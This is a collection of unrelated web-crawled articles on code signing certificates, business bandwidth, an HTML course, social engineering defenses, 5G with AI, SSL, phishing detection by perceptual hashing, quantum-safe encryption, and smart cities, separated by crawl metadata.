-Subject “Example of Your Code Signing Certificate” A screenshot of what this type of command script looks like in PowerShell. Likewise, you can also add your generated self signed certificate as a trusted certificate authority for the network by using Microsoft Management Console (type mmc.exe in RUN to open). And, after that, you’ll need to copy your generated self signed code signing certificate from the Personal folder and paste it into the folder named Certificates which is under the Trusted Root Certificate Authority. Here’s what it looks like while stored in the Personal folder: A screenshot of a code signing certificate that’s attached to a user’s account. However, it’s important to note that self signed code signing certificates can be misused. For this reason, as a software developer, you should only sign your executables using publicly trusted certificates. Here’s How It Could Go Wrong If You Use Self Signed Code Signing Certificate Although a self signed certificate is acceptable for internal purposes (such as testing), it’ll generate issues and warning messages if you try to use it to sign software, scripts or other executables that you publish online. For instance, your users will start receiving different warning messages (like the one below) whenever they try downloading or installing the software: A screenshot of the “Unknown” publisher warning that users see when they try to install an executable that’s not signed using a code signing certificate.em> No one want to see the word “unknown” associated with the publisher. Users want to know that their certificate is from a verified developer or publisher that they can trust. Of course, if you want to get rid of these types of Windows Defender SmartScreen warnings altogether, you’d need to sign your code using an extended validation code signing certificate. Not Signing Your Code Makes Your Software Look Dangerous Whether you use a self signed code signing certificate or don’t sign your software or code at all, the results will be similar. When someone tries to download your software through a web browser like Google Chrome or Mozilla Firefox, it will verify that a trusted source hasn’t issued the code signing certificate. Because of that, it’ll issue a browser warning message to the user. Such warning messages will make it appear like your software is malicious, and your users will most likely not be bothered to click and download it. As a result, your conversion will fail, and the user will leave your site. What About Free Code Signing Certificates — Are They Available? No, free publicly trusted code signing certificates aren’t something you can get. You must purchase them from third-party certificate authorities — like some of the ones we mentioned earlier (Sectigo and DigiCert). If you’re wondering why there’s a cost associated with these certificates, the answer is simple: code signing certificates aren’t free because they require CAs to go through a verification process before issuing them. CAs vouch for the organization’s or any individual software developer’s integrity, which is time-consuming and cannot be done free of cost. However, it doesn’t mean that you’ll be required to pay a hefty amount. Code signing certificates from respected CAs will fit in the budget of any organization or individual. We are sure you can afford it and get your code signed without breaking the bank. Buying a Code Signing Certificate From a Respected CA Is the Solution Code signing certificates aren’t as costly as you may think. For instance, a Comodo code signing certificate is offered for as low as $69 per year if you choose to go for a valid certificate for three years. Furthermore, you can also avail yourself of additional discounts by applying coupon codes on the very same product. Our Final Verdict on Using Self Signed Code Signing Certificates (Don’t In Most Cases) As mentioned above, self signed certificates are useful in certain scenarios like testing purposes. In other words, you can use it if you’re using it to make them appear trusted on any targeted particular machine by deploying it to the certificate store of Windows before installing the software. But those who’re looking to use a self signed certificate to sign a software they wish others to download onto their computers on which they don’t have any control must avoid using it. That is because, in such cases, self signed certificates are completely useless. Unlike code signing certificates from public CAs that require their users to go through a vetting process, a self signed code signing certificate doesn’t have any such process. That’s why it’s not recognized or trusted by browsers and operating systems. All of this is to say that self signed code signing certificates aren’t going to do you any good if you’re looking to sign executables and software that you distribute to customers. Therefore, it’s wise to avoid using a self signed certificate in many cases. However, if you want to use these digital certificates, you need to ensure that their usage remains limited to testing purposes within your internal environments only.
<urn:uuid:3853a952-f3a6-4832-9b22-3add322a46b8>
CC-MAIN-2022-40
https://codesigningstore.com/how-to-generate-self-signed-code-signing-certificate
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00421.warc.gz
en
0.925209
1,723
2.703125
3
The Internet has expanded people’s ability to do business, and with it has spurred a series of innovations that have effectively changed the world. With today’s businesses almost assuredly spending on at least one cloud-based solution, and with mobility eking into almost every business in one form or another, the demand for more bandwidth is something most businesses are wrangling with. Today, we’ll describe what having enough bandwidth means. Bandwidth is one of those terms that you think you understand until you try to explain it to someone else. In simple terms, bandwidth is how fast data can be transferred through a medium. In the case of the Internet, millions of bits need to be transferred from the web to network attached devices every second. The more bandwidth you have access to, the more data can be transferred. Speed vs Throughput Network speed–that is, how fast you are able to send and receive data–is typically a combination of available bandwidth and a measure called latency. The higher a network’s latency, the slower the network is going to be, even on high-bandwidth network connections. Latency can come from many parts of the network connection: slow hardware, inefficient data packing, wireless connections, and others. Throughput is the measure of the amount of data that is transmitted through a connection. Also called payload rate, this is the effective ability for any data to be transmitted through a connection. So, while bandwidth is the presumed amount of data any connection can transfer, throughput is the amount of data that actually is transferred through the connection. The disparity in the two factors can come from several places, but typically the latency of the transmitting sources results in throughput being quite a bit less than the bandwidth. What Do You Need Bandwidth For? The best way to describe this is to first consider how much data your business sends and receives. How many devices are transferring data? Is it just text files? Are there graphics and videos? Do you stream media? Do you host your website? Do you use any cloud-based platforms? Do you use video conferencing or any other hosted communications platform? All of these questions (and a few not mentioned) have to be asked so that your business can operate as intended. First, you need to calculate how many devices will connect to your network at the same time. Next, you need to consider the services that are being used. These can include, but are not limited to: - Data backup - Cloud services - File Sharing - Online browsing - Social media - Streaming audio - Streaming video - Interactive webinars - Uploads (files, images, video) - Video conferencing - Voice over Internet Protocol (VoIP) - Wi-Fi demands After considering all the uses, you then need to take a hard look at what required bandwidth is needed for all of those tasks. Obviously, if you lean on your VoIP system, or you are constantly doing video webinars, you will need to factor those operational decisions into your bandwidth decision making. Finally, once you’ve pinpointed all the devices and tasks, the bandwidth each task takes, and how many people on your network perform these tasks, you total up the traffic estimate. Can you make a realistic estimate with this information? Depending on your business’ size and network traffic, you may not be able to get a workable figure. Too Much or Not Enough Paying for too little bandwidth is a major problem, but so is paying for too much. Bandwidth, while more affordable than ever before, is still pretty expensive, and if you pay for too much bandwidth, you are wasting capital that you can never get back. That’s where the professionals come in. ExcalTech has knowledgeable technicians who can assess your bandwidth usage and work with your ISP to get you the right amount for your business’ usage. If you would like more information about bandwidth, its role in your business, or how to get the right amount for your needs, call us today at (877) 638-5464.
<urn:uuid:d4187c1b-ed76-4169-ba9b-b32903ed8ef0>
CC-MAIN-2022-40
https://www.excaltech.com/taking-a-long-look-at-your-companys-bandwidth-needs/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00421.warc.gz
en
0.946627
856
2.953125
3
HTML 4.0 Programming: Level 1 (Multi-platform) Course number: 075 906 Software version number: 4.0 Course length: 1 day Hardware/software required to run this course In order to run this course, you will need: See your reference manual for hardware considerations that apply to your specific hardware setup. Overview: Students will learn HTML code. Prerequisites: Windows 95 or greater, using the Internet, experience with Netscape or Microsoft browsers or equivalent knowledge. Delivery method: Instructor-led, group-paced, classroom-delivery learning model with structured hands-on activities. Benefits: Students will learn how to create Web pages using HTML code. Target student: Students enrolling in this course should understand how to use Windows 95 or greater as well as a browser for the Internet. What's next: HTML 4.0 Programming: Level 1 is the first course in this series. HTML 4.0 Programming: Level 2, the next course in this series, teaches student how to create more advanced Web pages. Lesson objectives help students become comfortable with the course, and also provide a means to evaluate learning. Upon successful completion of this course, students will be able to: Lesson 1: Overview of HTML Lesson 2: Formatting text with HTML Lesson 3: Adding local and remote links Lesson 4: Adding graphics and sound Lesson 5: Creating lists in HTML Lesson 6: Creating tables in HTML Lesson 7: Setting body and background attributes Lesson 8: Web page design guidelines Lesson 9: Adding links to other Internet services |Days Of Training||1.0| |Product Type||Print Courseware| |Publication Date||1998-08-13 00:00:00| |Secondary Category||Web Design|
<urn:uuid:b6692c8e-d05c-4226-8ab3-2ebad7acc6ef>
CC-MAIN-2022-40
https://store.emtmeta.com/quickview/product/quickview/id/7076/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00421.warc.gz
en
0.762767
451
2.953125
3
Defines a multi-dimensional database. A Mondrian schema contains a logical model, consisting of cubes, hierarchies, and members, and a mapping of this model onto a physical model. The logical model consists of the constructs used to write queries in the MDX language: cubes, dimensions, hierarchies, levels, and members. The physical model is the source of the data presented through the logical model. It is typically a star schema, which is a set of tables in a relational databases.
<urn:uuid:111c04bc-a6c9-4f70-b13c-af0bb2311bb0>
CC-MAIN-2022-40
https://help.hitachivantara.com/Documentation/Pentaho/6.0/0N0/010/070/040
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00421.warc.gz
en
0.908499
100
2.921875
3
Social engineering- the main tactic used by hackers to carry out a cyber-crime Ring Ring: the noise and quick conversation can cost organizations a million dollars. How is it possible? Say hello to social engineering attacks. Hackers use social engineering tactics to target people and take advantage of their carelessness or faulty behavior. They use people’s emotions and feelings to access data that can cost a fortune to the firm. The main goal behind a social engineering cybercrime is to gain victims’ trust and persuade them to share valuable information. So, what can firms do to protect themselves against cyber-crimes? One way is to educate the employees by giving them cyber security training through online cyber security training courses. But that’s just the tip of the iceberg. There are other preventive methods at the firm’s disposal. But, before we talk about them, let’s understand the mechanism behind a social engineering attack through real-life examples. What are the Dynamics of a Social Engineering Attack? Social engineering-the art of manipulating people to reveal sensitive data. Now, the type of information hackers use will vary, but most cybercriminals look for passwords, bank information, or even access computers to install malicious code. The easiest form of cyber-attack is social engineering, so it’s more prevalent in the IT industry. The weakest link in the security chain is humans, and we can say the most common threat always comes from within. That is why firms need to impart cyber security training to employees through top-rated online courses where they will learn from real-life examples. Types of Social Engineering Attacks That are Making Rounds in The Market Pharming: In this cyber-crime, the hacker will redirect users from the real website to a fake one to steal passwords or acquire other sensitive information. In this attack, hackers use browser settings or even run malicious code in the background. Phishing: In this attack, hackers act as an IT help desk accountant to mimic your brand look and purchase a domain like the real website. They will use a password reset with similar details to the old password field to gain entry into the account. Hackers will use this information to access the network and move deeper into the network. Vendor Scams for API Keys: Here, hackers will use the API key for a specific product, find tracking codes on the website, act as a member of the organization, and message you. Next, they will use the standard automated email that needs the API key and ask you to reset it by following a link. At this point, they will create a phishing website and ask you for the API key and ask the victims to reset. Once they gain the key information, they can use it to do anything on your behalf. Scareware: Through cybercrime, hackers scare people by telling them a virus has infected their computer. Next, they ask the victim to buy malware in the form of real cyber security software. If you want protection from social engineering attacks, ask your employees to work on real-time cyber security projects. The real projects will help them protect their system in the real world. Real-Life Examples of Cyber Security Social Engineering Attacks Shark Tank Attack of 2020 The television judge Barbara Corocran experienced a social engineering attack costing USD 400,00 in 2020. In this attack, a cybercriminal acted as her assistant and sent an email to a bookkeeper for the renewal of payment. But, the attack was identified beforehand when the bookkeeper sent an email to the correct address asking about the transaction. The auto parts supplier came under a social engineering attack that coasted USD 37million to Toyota Boshoku Corporation. Sony Pictures, 2014 In this social engineering attack, thousands of files were stolen, including business agreements, financial documents, and employee information. Cabarrus County, 2018 Due to the social engineering and BEC scam, Cabarrus County in the USA experienced a loss of USD 1.7 Million. FACC, $60 Million Loss The Chinese plane manufacturer lost about $60 million in a CEO fraud scam. Scammers impersonated a high-level executive to trick employees into transferring funds in this scam. How to Prevent a Social Engineering Attack? A Complete Guide!! Don’t want to be a victim? Trust us; it’s not rocket science to protect yourself from social engineering attacks. You need the right cyber security project tutorial, where employees will learn tips to protect their systems from potential threats. Other preventive measures include: Don’t Accept any Help from Unknown Sources Online Trust us; legitimate firms will not contact you for help; you have to contact them instead. Any request for help, like resetting passwords or restoring credit scores, can be a scam. Likewise, delete it if you receive a request for help from a charity that you don’t know. Make use of Spam Filters In the email program, you will find spam filters, set them to high, and check the folder to ensure there is no important email in spam. You can use a step by step by step guide to set the spam filters by using the name of the email provider. Always Secure your Computing Device To protect your system from cyber-attack, install anti-virus, firewalls, and email filters to ensure your security is top-notch. Select the automatic update setting for your operating system and manually update it whenever the automatic update fails and you receive a notification for the same. Firms can also use an anti-phishing tool provided by the web browser or third party to notify you about the risks. Now that you know the different types of social engineering attacks, are you all set to protect your system from one? Don’t know where to start! Fret not! School.infosec4tc has in store for you the best cyber security training course that will help your employees learn about the latest cyber security attacks and how to protect the system from such attacks.
<urn:uuid:02ea4942-4c03-420f-a7ea-3e11690a490b>
CC-MAIN-2022-40
https://www.infosec4tc.com/2022/05/31/social-engineering-attack-how-to-protect-yourself-and-real-life-examples/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00421.warc.gz
en
0.920467
1,242
3.015625
3
Artificial intelligence (AI) is the simulation of human intelligence processes by machines, usually computer systems. AI programs focus on three main cognitive skills: learning (acquiring data and creating rules for sorting that data), reasoning (choosing the right data to achieve the desired outcome), and self-correction (fine-tuning the data sorting for the most accurate results). The data sorting rules are known as algorithms, which offer step-by-step instructions for how to achieve an outcome. All US cellular carriers have now launched some form of 5G. What is 5G? 5G simply stands for fifth-generation cellular wireless. Its standards were first set in late 2017. There are three basic types of 5G service: low-band, mid-band, and high-band. They’re all incompatible right now, and they all perform differently. Even though all the US carriers “have” 5G right now, it will be another couple of years before we see significant changes from it. By comparison, 4G first rolled out in 2010, and it was 2012/2013 before major apps that required 4G to work became popular. However, Ericsson, a leading provider of Information and Communication Technology (ICT) for service providers, estimates that by 2024, 40% of the world will be connected by 5G. The “G” in 5G simply stands for “generation.” 1G was analog cellular service. 2G technologies were the first generation of digital cellular technologies. 3G technologies improved speeds from 200kbps to several megabits per second. 4G technologies are currently offering hundreds of Mbps and even up to gigabit-level speeds. 5G offers several new aspects: bigger channels to offer faster speeds, lower latency for higher responsiveness, and the ability to connect more devices at once. Image Source: Towards Data Science There are many complexities inherent in adopting 5G networks, and one way the industry is addressing those complexities is by integrating artificial intelligence into networks. When Ericsson surveyed decision-makers from 132 worldwide cellular companies, over 50% said they expected to integrate AI into their 5G networks by the end of 2020. The primary focus of AI integration is reducing capital expenditures, optimizing network performance, and building new revenue streams. 55% of decision-makers stated that AI is already being used to improve customer service and enhance customer experience by improving network quality and offering personalized services. 70% believe that using AI in network planning is the best method for recouping the investments made on switching networks to 5G. 64% of survey respondents will focus their AI efforts on network performance management. Other areas where cellular decision-makers intend to focus AI investments include managing SLAs, product life cycles, networks, and revenue. There are challenges associated with integrating AI into 5G networks, of course. Effective mechanisms for collecting, structuring, and analyzing the enormous volumes of data amassed by AI must be developed. For that reason, early AI adopters who find solutions to these challenges will emerge as the clear frontrunners as 5G networks become connected. While our smartphones have gotten increasingly smaller, the core algorithms that run them have not evolved since the 1990s. Therefore, 5G systems consume far more power than desired and achieve lower data rates than expected. Replacing traditional wireless algorithms with deep learning AI will dramatically reduce power consumption and improve performance. This approach will be fundamentally more significant than focusing AI primarily on network management and scheduling. Further, bandwidth used by current cellular networks operates on the radio spectrum. The electromagnetic waves in the frequency range of the radio spectrum are called radio waves. Radio waves are widely used in telecommunication, along with numerous other modern technologies. National laws strictly regulate interference between users of different radio waves, and the International Telecommunication Union (ITU) oversees the coordination of these laws. There is concern that the growing use of wireless technologies will overcrowd the airwaves our devices use to communicate with one another. One proposed method for resolving this issue is to develop communication devices that don’t broadcast on the same frequency every time. AI algorithms would then be used to find available frequencies by enabling intelligent awareness of RF activity that was not previously feasible. While 5G is up to 20 times faster than 4G, it offers more than just faster speeds. Due to its low latency, 5G speeds will allow developers to create applications that take full advantage of improved response times, including near real-time video transmission for sporting events or security purposes. Additionally, 5G connectivity will allow more access to real-time data from various solutions. 5G leverages Internet of Things (IoT) sensors that last for years, requiring far less power for operation. This could allow remote detection of farming irrigation levels and equipment condition changes in factories. Doctors could securely access patient data more easily. All these opportunities will require the use of AI to make them functional. Edge computing is the concept of processing and analyzing data in servers closer to the applications they serve. While it is growing in popularity and opening new markets for telecom providers, among other industries, many have argued that introducing “connected” products, such as coffee cups and pill dispensers, did not cause the market to spike as expected. Recent AI technology advancements, however, have begun to revolutionize industries and the amount of value all this connectivity can provide to consumers by combining big data, IoT, and AI.5G accelerates this revolution because the 5G network architecture easily supports AI processing. The 5G network architecture will change the future of artificial intelligence. 5G will enhance the speed and integration of other technologies, while AI will allow machines and systems to function with intelligence levels similar to that of humans. In a nutshell, 5G speeds up the services on the cloud while AI analyzes and learns from the same data faster. Simply put, machine learning (ML) is a subset of AI that creates algorithms and statistical models to perform a specific task without using explicit instructions, relying instead on patterns and inference. ML algorithms build mathematical models based on sample data, called training data, to make predictions or decisions without being programmed specifically for that task. Learned signal processing algorithms can empower the next generation of wireless systems with significant reductions in power consumption and improvements in density, throughput, and accuracy when compared to the brittle and manually designed systems of today. Deep learning is a subset of machine learning in which the algorithms used have many levels that each provide a different interpretation of the data. The subsequent network of algorithms is known as artificial neural networks because it resembles the neural networks of the human brain. Neural networks that learn how to communicate effectively, even under harsh impairments, are fast becoming a reality. A fully operative and efficient 5G network cannot be complete without AI. ML and AI integration into the network edge can be achieved through the use of 5G networks. 5G enables simultaneous connections to multiple IoT devices, generating massive amounts of data that must be processed using ML and AI. When ML and AI are integrated with 5G multi-access edge computing (MEC), wireless providers can offer: Existing 4G networks use Internet Protocol (IP) broadband connectivity to transmit, which offers poor efficiency. ML and AI allow 5G networks to be predictive and proactive, which is essential for 5G networks to become functional. By integrating ML into 5G technology, intelligent base stations will be able to make decisions for themselves, and mobile devices will be able to create dynamically adaptable clusters based on learned data. This will improve the efficiency, latency, and reliability of network applications. As the 5G network becomes increasingly complex and novel uses such as autonomous cars, industrial automation, virtual reality, e-health, and others emerge, ML will become essential in making the 5G vision a reality. As with any new technology, there are both significant potentials to be achieved and limitations to be overcome. Potentials of ML for 5G communications include: Limitations of ML for 5G communications include: With all this potential for using ML and AI to integrate with 5G networks, industries are already working toward innovating with 5G. Some of the top innovations on the horizon include:
<urn:uuid:8891190d-0188-43c9-a934-21b6c03ab408>
CC-MAIN-2022-40
https://www.deepsig.ai/how-artificial-intelligence-improves-5g-wireless-capabilities
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333541.98/warc/CC-MAIN-20220924213650-20220925003650-00621.warc.gz
en
0.943309
1,663
3.078125
3
Brute force attack is a technique used to explore an unknown value by systematically trying every key combination to gain access to the targeted resource. In the context of web applications, such attacks appear as a volley of HTTP requests that successively cycle through a user input value till the “right” value is hit. This value could be a GET or POST parameter, usernames and passwords, URL paths or header values. Such attacks are carried out using automated tools and scripts that try every possible character combination to explore the value that is sought. Attackers often make use of the fact that invalid inputs to web applications yield a different page than valid values. For example, an invalid username could yield one error message and an invalid password could yield another and a successful login yields a totally different page. An attacker can then write a script that cycles through username values till the error message is “invalid user”. When the error changes to “invalid password” the attacker can identify a valid username, and then proceed to cycle through passwords for that valid username, until the correct password is hit. The other weakness that facilitates this attack is the lack of a policy to enforce a maximum attempt count to access a particular resource. In addition to targeting login credentials, a brute force attack could also be used for guessing hidden pages or content, session ID values, one time passcodes, credit card numbers, and even reversing cryptographic hash functions. Because brute force attacks from a single client could be easy to spot and block, attackers frequently use multiple attack sources that try to attack the web application in concert. Therefore , a common by-product of brute force attacks is resource exhaustion on the server that could degrade the quality of service to genuine client. Indications of a Brute Force Attack Since brute force attacks require trial and error of a large set of values, the most common indicator is an unusual volume of failed requests. When a parameter is being attacked (like username) then the requests are all to the same page. If the attacker is trying to find hidden pages, then each request would be different but the server response codes will be 404: Page Not Found. A successful brute force attack can result in the following: - It can leak confidential and private data (for example: user’s profile data, bank details, financial status). - It can leak hidden files or interfaces (for example: admin interface). - It can disrupt the service if the service is attacked to the point of causing a denial of service (DoS). If the attackers succeed in gaining access to administrative panels, they can modify/delete/add web application content, modify user privileges, and more. Example: Brute Force Attack to Identify a URL in a Web Application The attacker uses a word list of known pages to execute a brute force attack on a web application. In the example below, the attacker tries a brute force attack on a popular content management system. The attacker sends request to each known page and then analyzes the HTTP response code to determine if the requested page exists on the target server. [root@localhost wfuzz-2.1-beta]# python wfuzz.py -c -z file,wordlist/general/common.txt --hc 404 http://X.X.X.X/FUZZ * Wfuzz 2.1 - The Web Bruteforcer * Total requests: 950 ID Response Lines Word Chars Request 00213: C=200 2 L 1 W 8 Ch "default" 00457: C=301 7 L 20 W 239 Ch "lost%2Bfound" 00472: C=301 7 L 20 W 235 Ch "manual" 00584: C=301 7 L 20 W 235 Ch "portal" 00759: C=200 828 L 2150 W 1275626 Ch "script" 00783: C=301 7 L 20 W 233 Ch "test" Total time: 19.71608 Processed Requests: 950 Filtered Requests: 944 How to Limit Attacks Brute force attacks are difficult to stop completely, but with proper countermeasures and a carefully designed website, it is possible to limit these attacks. Use the following measures on your login pages to defend against brute-force attacks: - Enforce long and secure passwords. - Limit the number of failed login attempts and block users who attempt to log in using different passwords within a short period of time. Note that this could potentially end up blocking genuine users, if attackers use their usernames too many times in failed login attempts. - Challenge suspicious requests with CAPTCHA or other challenges to prevent automated attacks. The Barracuda Web Application Firewall allows you to restrict the maximum attempts to access resources in a given time window. The counting can be done per source IP or across all sources. When clients violate the access policy, they can be either presented with a CAPTCHA to prove they are humans and not scripts or locked out for a time period you specify. OWASP Top 10, PCI-DSS
<urn:uuid:13936b25-71a2-4f55-991a-019707f5d9cd>
CC-MAIN-2022-40
https://campus.barracuda.com/product/webapplicationfirewall/doc/42049329/brute-force-attack
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334802.16/warc/CC-MAIN-20220926051040-20220926081040-00621.warc.gz
en
0.811819
1,102
3.625
4
Google takes web security standards very seriously and are looking to make the Internet a “safe place”. Accordingly, they offered a slight boost in ranking for SSL and HTTPS secured websites. However, things are soon going to change as from 2017 Google announced that their search engine algorithm will begin penalizing sites without SSL certificates. SSL is an acronym for Secure Sockets Layer – a standardized protocol that enables private and confidential sessions between two applications exchanging data over a TCP/IP connection. To put it simple, it’s a small data file that once installed onto your server, allows sensitive data such as credit card information, social security numbers and login credentials to be exchanged safely. When an SSL certificate is deployed it activates the HTTPS protocol on your website. When a site is secured and certified a green padlock and HTTPS will appear just left from the address bar in browsers (just like in the image below). If you are looking for more technical details about SSL Certificates you can find them in our knowledge base. Why do I need an SSL Certificate? In recent years, privacy and security became the most critical issues in the world of online business. If your customers don’t feel safe there’s no customer trust, and without customer trust a web based business just won’t do well. It’s even safe to say that the lack of security and privacy standards will most likely ruin an online endeavor. When your website is handling personal data, whether it’s through simple login forms, handling transactions or credit card data, security should be a top priority. It’s in this context that SSL Certificates join the game. Data transmitted between browsers and web servers is sent in form of plain text which makes it pretty vulnerable to eavesdropping. A hacker will easily grab and misuse intercepted information. With an SSL in place, a hacker will be unable to intercept that data. Also, statistically speaking, 70% of online shoppers cancel online orders if they don’t trust or feel comfortable executing the transaction. The main benefits of using SSLs: - Security – This one is quite self-explanatory. Hackers won’t be able to capture data exchanged through your site. SSL blocks interception or “man-in-the-middle attacks”. Even if you don’t handle sensitive data, an SSL certificate for your website is always a good idea. - Trust – Reasons for getting an SSL go a bit beyond simple security. It shows your visitors and customers that you are ready to go the extra mile to make sure they get the best possible experience – a key factor in building trustworthiness. - Rankings – Google’s search algorithm treats security as a ranking factor. They are actually pushing towards what they call “HTTPS everywhere” and clearly stated that sites that show an SSL are going to be treated better in terms of rankings. However, Google started to push harder in terms of website security, which makes it even more critical to deploy an SSL. Next will cover why now is the right time to get it. Why do I Need it Now? Not so long ago, HTTPS and SSL were heavy in terms of web performance and could ultimately end up slowing your site. However, this is not the case anymore as HTTPS technology has progressed and the impact of SSLs on performance became minimal or non-existent. With SSLs no longer being heavy and obstructing website performance, Google is shifting from boosting secured sites to actually penalizing those who aren’t. It’s a big step towards achieving their goal of a completely “safe Internet”. If you’re looking to keep up with Google’s best practices, it’s time to get your website an SSL certificate. As there are many types of SSL certificates one could dwell on which one to pick to best cover his needs. Here are the top 3 most important you should focus on: - Private certificates – Customers purchase their own single SSL certificate and have a dedicated IP address on each server for the domain the certificate was purchased for. - Wild card certificates – Enables SSL encryption on unlimited sub-domains with a single certificate as long as the domains share the same name and are owned by the same organization. - Multi-domain certificates – Enables securing up to a couple of hundred domains on the same server with a single certificate. It’s the best solution for businesses that host multiple unique domains on a single server as it saves money while enabling a high standard of security and trust. Once you get your SSL certificate you might want to display it. They usually come with a trust seal or badge that you can put somewhere on your website or Facebook Application page to put more emphasis on showing how much you care about your users online security. We hope this article helped you understand the reasons to why you should implement an SSL certificate along your online assets. Considering that the performance of a website (page load time) and the level of security standard it provides are becoming increasingly important as SEO factors, you might want consider wrapping your website with a CDN to make it faster. Even though SSL are not as heavy in terms of web performance as they used to, an SSL session requires multiple round trip communications between a client and server. With a CDN in place, this exchange is always closer to the end-user resulting in no delay and provides fast, consistent and secure performance worldwide. That way, beside showing your users that you are ready to go the extra mile, you can also protect your site from increasingly dangerous DDoS attacks as CDNs can easily absorb them. They often provide their own free and easy to deploy SSL certificates. Also, if you already have an SSL it is easy to integrate it with a CDN solution. To sum up, we strongly advise you to seriously evaluate your website performance and security standards as today they are more critical than ever before in terms of online reputation and trustworthiness. Want your customers to trust your website? Treat it with an SSL certificate, you won’t regret it and Google will love you more. If you have any further questions regard the topic or need help choosing and deploying the right security and performance solutions for your website feel free to contact our experts at GlobalDots.
<urn:uuid:7b5c756c-2b04-486a-b0b3-776fa8688b60>
CC-MAIN-2022-40
https://www.globaldots.com/resources/blog/why-you-need-ssl-and-why-you-need-it-now-google-will-love-you-more/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335034.61/warc/CC-MAIN-20220927131111-20220927161111-00621.warc.gz
en
0.943176
1,293
2.796875
3
The Ultimate Guide to Big Data Exploding information quantities to the emergence of the term ‘Big Data’ for datasets which can’t be handled by common database and data processing tools. It literally means what it says, but beyond Volume, there are additional characteristics commonly associated with Big Data. These include Velocity – the rate at which the data is generated (and therefore changes) is rapid; and Variety/Variability – multiple data types renders standard tools incapable of handling it. Generally Big Data refers to datasets measured in terabytes, petabytes, or greater. The term can refer to the datasets themselves, as well as techniques for analysis and visualisation.
<urn:uuid:67f342c0-15de-430d-8d6d-b3404a572737>
CC-MAIN-2022-40
https://securitybrief.asia/tag/big-data
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00621.warc.gz
en
0.933117
134
3.125
3
Peck began with a general discussion of phishing and its relative importance in the web app security space today. He pointed out that while phishing is old news, and isn’t the latest and greatest threat to hit the headlines, it is still out there and still causes damage. He put up some stats that show that phishing is alive and well (especially targeting Indian firms, apparently), but only constitutes about 1% of the overall amount of cybercrime. And while the overall amount may have grown with time, there is a question of “diminishing returns” based on the amount of effort required to combat an issue of comparatively lesser impact. It is unsurprising then that phishing detection remains largely unchanged since 2006: built on anti-spam technology (not all spam is phishing), sender blacklists, and site reputation. But changes in the environment have made these older techniques less and less effective. For example, user mobility makes perimeter defenses impossible (e.g. IPS). Also, with the large turnover in domain names and the ease of setting up new ones based on the new top-level domains, blacklists and reputation are hard to keep up to date. And the new vector of social media is almost impossible to police. To move forward with newer defenses, it is important to understand what makes phishing effective: the human factor. In Peck’s terms: humans are gullible, greedy, careless, and uninformed. To counter this problem, we should try to get the computer to see things the way we humans see things. One way to do this involves the use of perceptual hashing. Perceptual hashing involves making a hash or “fingerprint” of images. Peck briefly overviewed three hashes: the average hash, the discrete cosine transform hash (uses methods similar to lossy compression to focus on salient detail), and the difference hash (very fast). Comparison of hashes of two images (made with the same algorithm) uses the Hamming distance, which is the count of bits that differ between two hashes. Phishing detection can utilize these hashes. A library of perceptual hashes of web pages is compiled with associated known good originators. Pages can also be broken down into discrete images that can can be similarly hashed and cataloged. Then, when web pages or emails are encountered, those are hashed in the same way. If the hashes match or come close to those in the database, but the sender is different, a likely phishing attempt is flagged. Although I don’t think Peck described it as such, this is effectively a whitelist approach, making it much more maintainable than a list of constantly changing phishing sites. I wonder how perceptual hashing could be used by NTOSpider, NTOBJECTives’ web application vulnerability scanner. Perhaps current malware detection could be added as feature. Of course, this would require either NTO maintaining its own list of hashes, or use of another database. For a Barracuda labs site that uses perceptual hashing, see http://www.threatglass.com/ For some perceptual hashing code: http://www.phash.org/
<urn:uuid:f6eee252-da8e-430e-bee6-3462210a7eda>
CC-MAIN-2022-40
https://manvswebapp.com/improved-phishing-detection-using-perceptual-hashing
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00621.warc.gz
en
0.94076
647
2.625
3
IBM researchers have announced development of new “quantum safe” encryption techniques that they plan to deploy to the IBM Public Cloud in 2020. The techniques have also been prototyped as part of a quantum safe enterprise class tape system. According to the announcement, the new encryption algorithms are based on algebraic lattices, a class of mathematical problems that have not yet been shown to be susceptible to quantum computing solutions. The algorithms are implemented in “Cryptographic Suite for Algebraic Lattices” (CRYSTALS), a collection based on two primitives: Kyber, a secure key encapsulation mechanism, and Dilithium, a secure digital signature algorithm. IBM has donated the quantum safe algorithms to OpenQuantumSafe.org for developing additional open standards and has submitted them to NIST for standardization. Read more: Dark Reading
<urn:uuid:c1d64edc-2734-43fa-abf0-016c1537b8e8>
CC-MAIN-2022-40
https://www.globaldots.com/resources/blog/ibm-announces-quantum-safe-encryption/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335058.80/warc/CC-MAIN-20220927194248-20220927224248-00021.warc.gz
en
0.927541
177
2.5625
3
Planning a Smart City – a podcast by ARC Advisory ARC Advisory started a series of podcasts focused on Smart Cities. The first episode focuses on Planning a Smart City and looks deeper into the needed technology, actors, and the development of such a complex infrastructure. Larry O’Brien, Vice President of Research at ARC Advisory Group and Jim Frazer, Vice President of Smart Cities, discusses the definition of a smart city. They define it as a public agency containing cities, counties, states, provincial entities, or nations that embraces IoT to drive digital transformation within their organization while serving private interests as well. ARC comes with nine vertical applications required in a smart city such as the built environment, the energy infrastructure, telecommunications, transportation and mobility, government services, water, and wastewater, waste management, payments, and finance. All nine applications mentioned above are impacted by technology. Jim Frazer explains the seven different techniques that are fundamental in planning and building a smart city. These are: instrumentation and control with various metrics, connectivity, interoperability, cybersecurity and privacy, data management, computing resources, and analytics, and business intelligence. The two describe the first attempts of Smart City 1.0 that was supplier driven and 2.0 driven by government decisions. The latest iteration of Smart City 3.0 is driven by a 